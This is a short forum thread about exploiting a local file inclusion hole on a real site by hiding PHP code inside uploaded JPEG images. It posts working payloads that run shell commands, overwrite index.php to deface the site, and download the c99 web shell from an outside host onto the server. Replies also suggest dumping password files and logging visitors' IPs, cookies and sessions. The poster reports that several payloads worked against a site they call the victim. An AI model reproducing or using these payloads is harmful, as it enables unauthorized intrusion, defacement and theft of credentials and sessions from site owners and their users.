LFI JPEG PHP code

Ok I found the site that lets users upload JPEG pics and it is vulnerable to LFI. I put a small php script in the pic markup<? ob_clean(); system("dir"); die; ?> and it gave me the directory of the site. I echoed a message markup<? ob_clean(); system("echo Hello"); die; ?> and it worked. I was wondering can a script be used to overwrite the index someway. I tried markup<? ob_clean(); system("echo La Verdad Estaba Aqui> index.php"); die; ?> but I got an error about some T_string or something.

try to open the index file for writing, for example

markup<?php $file=fopen("index.php", "w"); fwrite($file,"hacked!"); ?>

that's how I'd try it.

Are there any tuts on LFI with upload scripts? Am I right in thinking that most upload scripts just take $_FILES and moves it from the tmp to another location, so at no point is it executed when its uploaded. I suppose though if it's uploaded on the victim server, if anyone views that image you can log their ip/cookie/session etc?

I found out wat 2 do markup<? fwrite(fopen("./c99.php", "w"), file_get_contents("http://www.place.com/c99.txt")); ?>

it uploads a shell

Nice, you could have also like printed out password files etc. I guess

At what stage is that code executed though? When its first uploaded or when its viewed on the site?